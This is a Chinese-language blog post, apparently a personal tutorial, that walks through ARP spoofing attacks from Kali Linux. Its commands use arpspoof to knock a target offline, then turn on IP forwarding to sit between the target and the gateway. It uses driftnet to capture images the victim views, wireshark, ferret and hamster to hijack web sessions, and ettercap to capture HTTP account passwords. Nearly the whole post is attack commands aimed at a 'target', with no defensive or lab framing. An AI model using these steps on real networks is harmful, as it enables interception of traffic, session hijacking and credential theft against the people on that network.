• arpspoof与其他几款工具的使用


    arpspoof 是一款进行arp欺骗的工具

    arpspoof -i 网卡 -t 目标ip 默认网关

    如果kali没有进行IP转发  那么目标就会因为配置错网而导致断网 这就是所谓的arp断网攻击

    开启IP转发:echo 1 >/proc/sys/net/ipv4/ip_forward
    关闭IP转发:echo 0 >/proc/sys/net/ipv4/ip_forward
    查看IP转发是否成功:cat /proc/sys/net/ipv4/ip_forward  如果显示1则表示开启成功,显示0则开启失败

    开启IP转发后 流量会经过kali的主机而后再去到目标 所以这时开启arpspoof 那么目标就不会断网

    因为流量通过了kali主机那么我们就可以做点手脚了

    比如:

    获取目标主机正在访问的图片-->工具 arpspoof 和 driftnet 

    driftnet用法: driftnet -i 网卡 

    在开启路由转发后 开启arpspoof 因为流量通过了kali主机 我们就可以用driftnet获取在流量中的图片 

    会话劫持-->工具 arpspoof 和 wireshark , ferret, hamster

    wireshark  抓包工具
    ferret  将.pcap文件转换问.txt给hamster使用
    hamster 重新释放流量

    1.开启ip转发和arpspoof

    2.用wireshark抓包并报存到/root/目录(文件格式为.pcap)->在命令行直接输入wireshark即可打开工具

    3.用 cd 切换到/root/目录 用ferret将wireshark保存的.pcap格式文件转换为txt文件

    ferret用法: ferret -r .pcap格式文件 

    4.用hamster重放流量

    hamster用法: hamster  -h

    5.在浏览器中设置代理127.0.0.1:1234 然后访问127.0.0.1:1234 

    如果在浏览器下方出现目标ip则成功 反之失败

    点击那个标签 浏览器左边就会出现很多url 这些就是目标访问的网站  点击这些url 就可以了

    ~~~~~

    获取目标http账号密码

    1.开启ip转发和arpspoof

    2.开启ettercap

    Ettercap -Tq -i 网卡

    如果目标登录了某网站 那么我们可以获取他的账号密码了

      

  • 相关阅读:
    Peewee中join三张及以上的表时只能获取一张表的数据
    Ubuntu18.04安装 NVIDIA显卡驱动+CUDA+cuDNN+Pytorch
    Kubernetes Deployment 并行重启Pod
    git config 配置用户名、邮箱
    Python __str__() 方法
    阅读-自律100天-SMART法则
    Jenkins 调用执行jmeter脚本,并直接生成html报告
    推荐一款开源的Diffy自动化测试框架(转)
    mysql binlog日志自动清理及手动删除
    大数据测试
  • 原文地址:https://www.cnblogs.com/s0ky1xd/p/5196661.html
Copyright © 2020-2023  润新知